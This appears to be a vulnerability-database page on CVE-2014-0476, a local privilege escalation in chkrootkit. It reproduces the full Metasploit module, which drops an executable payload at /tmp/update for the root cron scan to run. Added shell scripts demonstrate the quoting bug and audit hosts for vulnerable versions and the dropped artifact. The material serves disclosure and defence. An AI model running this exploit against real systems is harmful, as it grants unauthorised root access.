metasploit | Thomas Stangner, Julien "jvoisin" Voisin | MSF:EXPLOIT-UNIX-LOCAL-CHKROOTKIT-
History: Nov 18, 2015 - 6:50 p.m.

Chkrootkit Local Privilege Escalation

2015-11-18 18:50:57
Thomas Stangner, Julien "jvoisin" Voisin
www.rapid7.com
46

CVSS2: 3.7
Attack Vector: LOCAL
Attack Complexity: HIGH
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:L/AC:H/Au:N/C:P/I:P/A:P

Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.
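The reason a file in /tmp ends up being executed by a root-owned scan is a shell-quoting defect, not a deliberate feature. The following added illustration (written for this page; it is not chkrootkit's own source and the function names, the temp directory and the candidate script are all constructed for the demo) shows the defect class reported in the referenced oss-sec post: an unquoted statement of the form `var=$var $i` is parsed by POSIX sh as "run the command `$i` with `var` set in its environment" rather than as a string append, so whatever path `$i` holds is executed. The hardened form beside it quotes the right-hand side, which turns the line back into a plain assignment.

```shell
#!/bin/sh
# Added illustration of the defect class behind this finding, not chkrootkit's
# own source. In POSIX sh the statement  var=$var $i  (unquoted) is not a
# string append: the shell reads it as "run $i with var in its environment".
# Quoting the right-hand side makes it a plain assignment again.
#
# Everything below runs inside a private temp dir with a constructed candidate
# script that only creates a marker file.

# Create the demo directory with a harmless executable "update" in it.
# Prints the directory path.
setup_demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ntouch "%s"\n' "$dir/ran" > "$dir/update"
    chmod +x "$dir/update"
    printf '%s\n' "$dir"
}

# Vulnerable form. $1 = candidate path, $2 = marker path the candidate creates.
# Prints "executed" if the candidate ran, "not-executed" otherwise.
unquoted_append() {
    rm -f "$2"
    i="$1"
    file_port=""
    file_port=$file_port $i      # parsed as: file_port="" "$i"  -> runs $i
    if [ -e "$2" ]; then printf 'executed\n'; else printf 'not-executed\n'; fi
}

# Hardened form: the same statement with the right-hand side quoted.
quoted_append() {
    rm -f "$2"
    i="$1"
    file_port=""
    file_port="$file_port $i"    # plain assignment; nothing is executed
    if [ -e "$2" ]; then printf 'executed\n'; else printf 'not-executed\n'; fi
}

demo=$(setup_demo)
echo "unquoted: $(unquoted_append "$demo/update" "$demo/ran")"
echo "quoted:   $(quoted_append "$demo/update" "$demo/ran")"
rm -rf "$demo"
```

Running it prints `unquoted: executed` and `quoted: not-executed`. Note that in the unquoted case `file_port` is still empty afterwards: the original intent (accumulating matching paths) silently fails while the side effect happens, which is why the bug went unnoticed in normal operation.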

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chkrootkit Local Privilege Escalation',
        'Description' => %q{
          Chkrootkit before 0.50 will run any executable file named /tmp/update
          as root, allowing a trivial privilege escalation.

          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
          scheduled by default.
        },
        'Author' => [
          'Thomas Stangner', # Original exploit
          'Julien "jvoisin" Voisin' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-0476'],
          ['OSVDB', '107710'],
          ['EDB', '33899'],
          ['BID', '67813'],
          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
        ],
        'DisclosureDate' => '2014-06-04',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'SessionTypes' => ['shell', 'meterpreter'],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Passive,
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end
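The module's `check` method only pattern-matches `0\.[1-4]` in the `chkrootkit -V` banner. A defender auditing hosts wants a numeric comparison against 0.50 and a look for the on-disk artifact the module leaves while it waits for cron. The script below is an added audit helper written for this page; it is not part of the Metasploit module or of chkrootkit. The default binary path and temp directory are assumptions, and the `CHKROOTKIT` environment variable is a constructed convenience, not an option of either tool.

```shell
#!/bin/sh
# Added defender-side audit helper, not part of the Metasploit module or of
# chkrootkit. It (1) parses the "chkrootkit -V" banner and compares the version
# numerically against 0.50, which also catches releases such as 0.07 that a
# /0\.[1-4]/ regex would miss, and (2) looks for the artifact this module drops
# before cron fires: an executable "update" file in the temp directory.

# Exit 0 if the banner names a chkrootkit release before 0.50,
# 1 if it is 0.50 or later, 2 if no version could be parsed.
version_before_050() {
    ver=$(printf '%s\n' "$1" \
        | sed -n 's/.*chkrootkit version \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p' \
        | head -n 1)
    [ -n "$ver" ] || return 2
    major=${ver%% *}
    minor=${ver#* }
    # Drop leading zeros so "07" is not read as octal by the test operators.
    major=$(printf '%s' "$major" | sed 's/^0*//'); [ -n "$major" ] || major=0
    minor=$(printf '%s' "$minor" | sed 's/^0*//'); [ -n "$minor" ] || minor=0
    [ "$major" -eq 0 ] && [ "$minor" -lt 50 ]
}

# Exit 0 if an executable regular file named "update" exists in the given
# directory (default /tmp); this is the artifact left behind until cleanup.
update_artifact_present() {
    [ -f "${1:-/tmp}/update" ] && [ -x "${1:-/tmp}/update" ]
}

# Report on the host this runs on. CHKROOTKIT is an assumed env override.
audit_host() {
    bin=${CHKROOTKIT:-/usr/sbin/chkrootkit}
    if [ -x "$bin" ]; then
        banner=$("$bin" -V 2>&1)
        rc=0; version_before_050 "$banner" || rc=$?
        case $rc in
            0) echo "VULNERABLE: $banner (before 0.50)" ;;
            1) echo "ok: $banner" ;;
            *) echo "could not parse version from: $banner" ;;
        esac
    else
        echo "chkrootkit not found at $bin"
    fi
    if update_artifact_present /tmp; then
        echo "ARTIFACT: executable /tmp/update present; inspect it before the next scheduled scan"
    fi
    # Debian-style packaging runs the scan from cron.daily; if this entry
    # exists, a dropped file is picked up within a day, matching WfsDelay.
    ls -l /etc/cron.daily/chkrootkit 2>/dev/null
}

audit_host
```

The version parser returns distinct exit codes so a caller can tell "patched" from "could not determine", which matters when rolling this across a fleet; the artifact check is a quick indicator rather than proof, since any executable /tmp/update is suspicious regardless of who created it.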
